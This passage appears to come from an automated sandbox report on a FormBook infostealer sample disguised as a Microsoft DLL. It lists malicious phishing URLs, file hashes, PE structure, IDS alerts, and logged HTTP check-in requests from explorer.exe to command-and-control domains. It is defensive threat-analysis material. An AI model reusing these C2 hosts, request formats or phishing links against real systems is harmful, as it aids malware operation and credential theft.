31XL-2FdkQFVX-2FvKoidSdihPInEuAOdWI1j9hzoAGhHvgihzB2QguTb0UI69IhpD-2F04yAWxjsiROcIlsn6ZkQGjPYs8hmDeoVvaju8LZNHjTuCvLMJwx1XIr-2Fjwlp6jRjYyFVWPQmtQnxNDijYoqRCstxdGet hashmaliciousBrowse
                                • 104.17.25.14
                                SecureMessageAtt.htmGet hashmaliciousBrowse
                                • 104.18.11.207
                                C9Xo1blOWEGet hashmaliciousBrowse
                                • 104.29.0.176
                                apep.x86Get hashmaliciousBrowse
                                • 172.68.102.186
                                https://katiebanks.alboompro.com/questfillGet hashmaliciousBrowse
                                • 104.17.146.91
                                http://myritejusrrt.com/sharefile/Get hashmaliciousBrowse
                                • 104.18.10.207
                                http://dakqcdfsnp.malabarrx.com/#.aHR0cHM6Ly9zdG9yYWdlYXBpLmZsZWVrLmNvL2NlZmJhYjNmLWJkZmUtNDc4ZS05NDFjLWEyYThhM2JmMTQ2YS1idWNrZXQvbGx5L2luZGV4Lmh0bT9lbWFpbD1zdXNhbl9nb21lekBmZC5vcmc=Get hashmaliciousBrowse
                                • 104.17.25.14
                                https://wp20.ru/t922555594/Get hashmaliciousBrowse
                                • 172.67.181.197
                                https://wp20.ru/t476525124/Get hashmaliciousBrowse
                                • 104.21.35.251
                                https://r.smtp.trigo-group.com/tr/cl/cnUPg73igMp2gSFYm1DYt5UIjtVZc5gV8BaIgQw7s-PllnR_XUno-B4dhxnYryZ3ISaxXguvWSB2lXXWHGYcKYEkChHXnLpMvfubdwQGOhT93ZxJ_vWyxfojnc34Fousm9DNiOjwr09beglbV0r9WMJzm-NxkvLQjnwCeCxzsshqeMOz6NQx1LjzxA1SGXFdeG2IuDFTJAZhzplDO9o3cw7vODoLNSPsjEr5gOgzwroMrVZRwyL7dkPyKruqYyRZopi4tS0ow5-xAgOqdDWYfwe2YSJiv3VBr5h-hYMEcl0V6Y3tVZ8ys1_WJScZ_x-UWgGet hashmaliciousBrowse
                                • 104.18.11.207
                                http://clearlane.co.vu/tread/index.htmlGet hashmaliciousBrowse
                                • 104.18.11.207
                                http://clearlane.co.vu/tread/index.html?_sm_au_=iHVZttq5Qzrf7sMtGet hashmaliciousBrowse
                                • 104.18.11.207
                                http://dolphin-app-cb6dz.ondigitalocean.app/werrx01/?phone=+1-855-484-2062&tblci=GiDY8OOFJ4OWyG0YghlYPduRPIcwKwtLwvOZ0P-6j4F8pCCw_lgoo9m7gaGquIOaAQ&utm_medium=referral&utm_source=taboolaGet hashmaliciousBrowse
                                • 104.18.11.207
                                http://srhuxpajna.malabarrx.com/#.aHR0cHM6Ly9zdWJzZXF1ZW50LmdsaXRjaC5tZS9pbmRleC5odG0/ZW1haWw9bGV3aXMuYnVybnMtYWxsYW5AZ2xvYmFsLmNvbQ==Get hashmaliciousBrowse
                                • 188.114.97.3
                                https://formcrafts.com/a/vendorGet hashmaliciousBrowse
                                • 104.16.122.175
                                https://r20.rs6.net/tn.jsp?t=qcuzd54ab.0.0.sqy9yutab.0&1d=preview&r=3&p=https%3A%2F%2F6z81j5.codesandbox.io?dg=cnZpbmNlbnRAaWNvbmVjdGl2LmNvbQ==Get hashmaliciousBrowse
                                • 104.18.18.132
                                sxwJhFA5pT.exeGet hashmaliciousBrowse
                                • 188.114.97.3
                                https://bymwx1.axshare.comGet hashmaliciousBrowse
                                • 104.17.212.204
                                PO2762712 and Company Profile.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                No context
                                No context
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):522
                                Entropy (8bit):5.348034597186669
                                Encrypted:false
                                SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:MLU84qpE4Ks2wKDE4KhK3VZ9pKhk
                                MD5:D4AF6B20AEA9906B4FF574A174E96287
                                SHA1:81655019BB100FAADD5B36755F798EE5FB09E672
                                SHA-256:DD8AE93DA079839B31327D22A2408E0C3EA4DDE92FD389CD5B96AD57CCE7B2E1
                                SHA-512:6D912AC17876D9C21E61ED8C1B435AEA0FBB27FB97626A40903B4DFFC1204BEF3A43B02805DEDD2531822FD6F62CF06F0D758C1B2CA07258E82F95225D71C16E
                                Malicious:true
                                Reputation:moderate, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.118963567258477
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:SecuriteInfo.com.Variant.Tedy.130342.18814.exe
                                File size:1932800
                                MD5:9042135a78a25e60669964f0e673d764
                                SHA1:0186f581ebb95406ea4f1a631080f2b60fa364fa
                                SHA256:f85d2878993aa3b49cc697b8b4dd73c75abd3a6e5891d0a6121da7aa272cc666
                                SHA512:d4c49b394db14d6b275ba1447568dd31c9ffb0e1eb0173459339fff673ad2b874017cef6a217ded862c048f4bbc69138bc64c1b7501f1e3e344553946e2a1f30
                                SSDEEP:24576:VlerLa/fP+WSnWMI/fbsWiCLEy5fq+z5fq+sOT75fq+W5fq+tJX5fq+z0sz5fq+8:ecP/Sn9AfbsirOEIZJVXG
                                TLSH:1D95D015B360EB4BC22AB33B9865F73502661BC6BE17E7459534BAE33C523818F607D2
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....d].........."...0.................. ........@.. ....................................`................................
                                Icon Hash:0325656d6d67291f
                                Entrypoint:0x5cfa04
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                Time Stamp:0x5D641EF9 [Mon Aug 26 18:03:37 2019 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1cf8ec0x4a.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d00000x9d70.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1da0000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x1cf9360x1c.text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x1cda0a0x1cdc00False0.704568430225data7.09655147134IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc0x1d00000x9d700x9e00False0.96640130538data7.89311690155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x1da0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x1d00e80x9771PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                RT_GROUP_ICON0x1d985c0x14data
                                RT_VERSION0x1d98700x500dataEnglishUnited States
                                DLLImport
                                mscoree.dll_CorExeMain
                                DescriptionData
                                Assembly Version16.0.0.0
                                LegalCopyright Microsoft Corporation. All rights reserved.
                                InternalNameMicrosoft.VisualStudio.Services.Client.Interactive.dll
                                FileVersion16.153.29226.1 built by: releases/M153 (3d1d32e8a5)
                                CompanyNameMicrosoft Corporation
                                Commentsf15756cb
                                ProductNameMicrosoft Azure DevOps Server
                                ProductVersion16.153.29226.1
                                FileDescriptionMicrosoft.VisualStudio.Services.Client.Interactive.dll
                                OriginalFilenameMicrosoft.VisualStudio.Services.Client.Interactive.dll
                                Translation0x0409 0x04b0
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                192.168.2.5104.21.18.17149861802031449 06/06/22-23:33:30.335478TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986180192.168.2.5104.21.18.171
                                192.168.2.5162.213.255.23749865802031449 06/06/22-23:33:46.702528TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986580192.168.2.5162.213.255.237
                                192.168.2.5104.21.18.17149861802031453 06/06/22-23:33:30.335478TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986180192.168.2.5104.21.18.171
                                192.168.2.5104.21.18.17149861802031412 06/06/22-23:33:30.335478TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986180192.168.2.5104.21.18.171
                                192.168.2.534.102.136.18049859802031453 06/06/22-23:33:25.150349TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985980192.168.2.534.102.136.180
                                192.168.2.534.102.136.18049859802031412 06/06/22-23:33:25.150349TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985980192.168.2.534.102.136.180
                                192.168.2.5162.213.255.23749865802031453 06/06/22-23:33:46.702528TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986580192.168.2.5162.213.255.237
                                192.168.2.534.102.136.18049859802031449 06/06/22-23:33:25.150349TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985980192.168.2.534.102.136.180
                                192.168.2.5162.213.255.23749865802031412 06/06/22-23:33:46.702528TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986580192.168.2.5162.213.255.237
                                TimestampSource PortDest PortSource IPDest IP
                                Jun 6, 2022 23:33:25.126621962 CEST4985980192.168.2.534.102.136.180
                                Jun 6, 2022 23:33:25.143158913 CEST804985934.102.136.180192.168.2.5
                                Jun 6, 2022 23:33:25.143383026 CEST4985980192.168.2.534.102.136.180
                                Jun 6, 2022 23:33:25.150348902 CEST4985980192.168.2.534.102.136.180
                                Jun 6, 2022 23:33:25.167030096 CEST804985934.102.136.180192.168.2.5
                                Jun 6, 2022 23:33:25.265573025 CEST804985934.102.136.180192.168.2.5
                                Jun 6, 2022 23:33:25.265628099 CEST804985934.102.136.180192.168.2.5
                                Jun 6, 2022 23:33:25.265902042 CEST4985980192.168.2.534.102.136.180
                                Jun 6, 2022 23:33:25.265983105 CEST4985980192.168.2.534.102.136.180
                                Jun 6, 2022 23:33:25.586262941 CEST4985980192.168.2.534.102.136.180
                                Jun 6, 2022 23:33:25.604597092 CEST804985934.102.136.180192.168.2.5
                                Jun 6, 2022 23:33:30.300307989 CEST4986180192.168.2.5104.21.18.171
                                Jun 6, 2022 23:33:30.335159063 CEST8049861104.21.18.171192.168.2.5
                                Jun 6, 2022 23:33:30.335325003 CEST4986180192.168.2.5104.21.18.171
                                Jun 6, 2022 23:33:30.335478067 CEST4986180192.168.2.5104.21.18.171
                                Jun 6, 2022 23:33:30.367799044 CEST8049861104.21.18.171192.168.2.5
                                Jun 6, 2022 23:33:30.417345047 CEST8049861104.21.18.171192.168.2.5
                                Jun 6, 2022 23:33:30.417365074 CEST8049861104.21.18.171192.168.2.5
                                Jun 6, 2022 23:33:30.417429924 CEST8049861104.21.18.171192.168.2.5
                                Jun 6, 2022 23:33:30.417551994 CEST4986180192.168.2.5104.21.18.171
                                Jun 6, 2022 23:33:30.417597055 CEST4986180192.168.2.5104.21.18.171
                                Jun 6, 2022 23:33:35.481024027 CEST4986280192.168.2.534.117.168.233
                                Jun 6, 2022 23:33:35.497705936 CEST804986234.117.168.233192.168.2.5
                                Jun 6, 2022 23:33:35.497845888 CEST4986280192.168.2.534.117.168.233
                                Jun 6, 2022 23:33:35.498003006 CEST4986280192.168.2.534.117.168.233
                                Jun 6, 2022 23:33:35.514497042 CEST804986234.117.168.233192.168.2.5
                                Jun 6, 2022 23:33:35.601926088 CEST804986234.117.168.233192.168.2.5
                                Jun 6, 2022 23:33:35.601943970 CEST804986234.117.168.233192.168.2.5
                                Jun 6, 2022 23:33:35.602359056 CEST4986280192.168.2.534.117.168.233
                                Jun 6, 2022 23:33:35.602405071 CEST4986280192.168.2.534.117.168.233
                                Jun 6, 2022 23:33:35.620863914 CEST804986234.117.168.233192.168.2.5
                                Jun 6, 2022 23:33:40.670095921 CEST4986380192.168.2.5203.170.80.250
                                Jun 6, 2022 23:33:40.883769989 CEST8049863203.170.80.250192.168.2.5
                                Jun 6, 2022 23:33:40.883932114 CEST4986380192.168.2.5203.170.80.250
                                Jun 6, 2022 23:33:40.884038925 CEST4986380192.168.2.5203.170.80.250
                                Jun 6, 2022 23:33:41.099994898 CEST8049863203.170.80.250192.168.2.5
                                Jun 6, 2022 23:33:41.100023985 CEST8049863203.170.80.250192.168.2.5
                                Jun 6, 2022 23:33:41.100198984 CEST4986380192.168.2.5203.170.80.250
                                Jun 6, 2022 23:33:41.100404978 CEST4986380192.168.2.5203.170.80.250
                                Jun 6, 2022 23:33:41.315495968 CEST8049863203.170.80.250192.168.2.5
                                TimestampSource PortDest PortSource IPDest IP
                                Jun 6, 2022 23:33:25.097003937 CEST5712753192.168.2.58.8.8.8
                                Jun 6, 2022 23:33:25.120043993 CEST53571278.8.8.8192.168.2.5
                                Jun 6, 2022 23:33:30.273322105 CEST5678453192.168.2.58.8.8.8
                                Jun 6, 2022 23:33:30.298358917 CEST53567848.8.8.8192.168.2.5
                                Jun 6, 2022 23:33:35.435944080 CEST5955853192.168.2.58.8.8.8
                                Jun 6, 2022 23:33:35.468976974 CEST53595588.8.8.8192.168.2.5
                                Jun 6, 2022 23:33:40.634903908 CEST6138453192.168.2.58.8.8.8
                                Jun 6, 2022 23:33:40.668893099 CEST53613848.8.8.8192.168.2.5
                                Jun 6, 2022 23:33:46.115030050 CEST5253053192.168.2.58.8.8.8
                                Jun 6, 2022 23:33:46.143282890 CEST53525308.8.8.8192.168.2.5
                                Jun 6, 2022 23:33:53.724883080 CEST6049653192.168.2.58.8.8.8
                                Jun 6, 2022 23:33:53.831108093 CEST53604968.8.8.8192.168.2.5
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Jun 6, 2022 23:33:25.097003937 CEST192.168.2.58.8.8.80xb624Standard query (0)www.foldemforever.comA (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:30.273322105 CEST192.168.2.58.8.8.80x18a6Standard query (0)www.fuugiti.xyzA (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:35.435944080 CEST192.168.2.58.8.8.80x730fStandard query (0)www.coraroseromance.netA (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:40.634903908 CEST192.168.2.58.8.8.80xa550Standard query (0)www.loveuco.comA (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:46.115030050 CEST192.168.2.58.8.8.80x771Standard query (0)www.rapiturs.comA (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:53.724883080 CEST192.168.2.58.8.8.80x7a08Standard query (0)www.budurr.comA (IP address)IN (0x0001)
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Jun 6, 2022 23:33:25.120043993 CEST8.8.8.8192.168.2.50xb624No error (0)www.foldemforever.comfoldemforever.comCNAME (Canonical name)IN (0x0001)
                                Jun 6, 2022 23:33:25.120043993 CEST8.8.8.8192.168.2.50xb624No error (0)foldemforever.com34.102.136.180A (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:30.298358917 CEST8.8.8.8192.168.2.50x18a6No error (0)www.fuugiti.xyz104.21.18.171A (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:30.298358917 CEST8.8.8.8192.168.2.50x18a6No error (0)www.fuugiti.xyz172.67.182.198A (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:35.468976974 CEST8.8.8.8192.168.2.50x730fNo error (0)www.coraroseromance.netgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)
                                Jun 6, 2022 23:33:35.468976974 CEST8.8.8.8192.168.2.50x730fNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)
                                Jun 6, 2022 23:33:35.468976974 CEST8.8.8.8192.168.2.50x730fNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:40.668893099 CEST8.8.8.8192.168.2.50xa550No error (0)www.loveuco.com203.170.80.250A (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:46.143282890 CEST8.8.8.8192.168.2.50x771No error (0)www.rapiturs.com162.213.255.237A (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:53.831108093 CEST8.8.8.8192.168.2.50x7a08No error (0)www.budurr.com173.239.8.164A (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:53.831108093 CEST8.8.8.8192.168.2.50x7a08No error (0)www.budurr.com173.239.5.6A (IP address)IN (0x0001)
                                Jun 6, 2022 23:33:53.831108093 CEST8.8.8.8192.168.2.50x7a08No error (0)www.budurr.com74.206.228.78A (IP address)IN (0x0001)
                                • www.foldemforever.com
                                • www.fuugiti.xyz
                                • www.coraroseromance.net
                                • www.loveuco.com
                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.54985934.102.136.18080C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Jun 6, 2022 23:33:25.150348902 CEST10536OUTGET /aet3/?l48p=kapzR8JPYtO2Wg0hfvI2cMfxoG1KoiKvyBJf4rs85HfCQVdH/hem3I02OclTyA2jLT1l&vHn=5j90bfXx9vsx HTTP/1.1
                                Host: www.foldemforever.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jun 6, 2022 23:33:25.265573025 CEST10537INHTTP/1.1 403 Forbidden
                                Server: openresty
                                Date: Mon, 06 Jun 2022 21:33:25 GMT
                                Content-Type: text/html
                                Content-Length: 291
                                ETag: "629e372d-123"
                                Via: 1.1 google
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.549861104.21.18.17180C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Jun 6, 2022 23:33:30.335478067 CEST10544OUTGET /aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx HTTP/1.1
                                Host: www.fuugiti.xyz
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jun 6, 2022 23:33:30.417345047 CEST10545INHTTP/1.1 302 Found
                                Date: Mon, 06 Jun 2022 21:33:30 GMT
                                Content-Type: text/html
                                Transfer-Encoding: chunked
                                Connection: close
                                location: 404.html
                                vary: Accept-Encoding
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ckjt3Lc%2F8FjQle6Ewp4ImaVx8%2BHMf%2ByWRbAP%2FsrJXDU89TqeVWK82WCCwlQTlPTQLyMRXiVs7O2mzZRVMHYkBTJZpIP%2BldsPMLNjiaXfXxFfrbXcshnR64CdW6ZPd258LOQ%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 71744448ad7371c9-LHR
                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Jun 6, 2022 23:33:30.417365074 CEST10546INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65
                                Data Ascii: 2c2<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, H
                                Jun 6, 2022 23:33:30.417429924 CEST10546INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.54986234.117.168.23380C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Jun 6, 2022 23:33:35.498003006 CEST10547OUTGET /aet3/?l48p=X6tC1H3r17TreXHELX+2yuKJ2Zy3hFZBFF1ZVzxWbyQ4jAOrOCxIDAhBMXT7pXuuuH38&vHn=5j90bfXx9vsx HTTP/1.1
                                Host: www.coraroseromance.net
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jun 6, 2022 23:33:35.601926088 CEST10548INHTTP/1.1 301 Moved Permanently
                                Date: Mon, 06 Jun 2022 21:33:35 GMT
                                Content-Length: 0
                                location: https://www.coraroseromance.net/aet3?l48p=X6tC1H3r17TreXHELX+2yuKJ2Zy3hFZBFF1ZVzxWbyQ4jAOrOCxIDAhBMXT7pXuuuH38&vHn=5j90bfXx9vsx
                                strict-transport-security: max-age=3600
                                x-wix-request-id: 1654551215.50730059403198616
                                Age: 0
                                Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3
                                X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/HMEnKR1XA+4gsPKvpF+JNj,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=,2d58ifebGbosy5xc+FRalmbPO1WMyccEhMkQjjFtfbKaFXZiMnKxsjK5EXCro7ggGLC2TD/UgrnlY2mEQHTqy/gzhVc3+eVxIR0uyRHmayM=,2UNV7KOq4oGjA5+PKsX47Mm9sOge7X4dT7rtPZIDoNRYgeUJqUXtid+86vZww+nL,7npGRUZHWOtWoP0Si3wDp6z7IyfxLR0DvGF38ZVfcXQ=,xTu8fpDe3EKPsMR1jrheEPebiodG1ecEvso8LOxPZhk=,wjXkXN74v+Dcwxj+Ualvvp/y9QaRAFtUM0vl2NX3XUuRLk+nKd5t5qBKFq4xFAf3CONUzZLbexpS3PEZaUF96g==
                                Cache-Control: no-cache
                                X-Content-Type-Options: nosniff
                                Server: Pepyaka/1.19.10
                                Via: 1.1 google
                                x-wix-google-ccm: 1
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                3192.168.2.549863203.170.80.25080C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Jun 6, 2022 23:33:40.884038925 CEST10549OUTGET /aet3/?l48p=Cb4ia8HH1RnDyQ8jvjqe0JDM7pVrsOY5rXp7lN7wIP/kU7YbHz52vieK+EDcuAZr7Fd5&vHn=5j90bfXx9vsx HTTP/1.1
                                Host: www.loveuco.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:23:31:38
                                Start date:06/06/2022
                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe"
                                Imagebase:0x950000
                                File size:1932800 bytes
                                MD5 hash:9042135A78A25E60669964F0E673D764
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
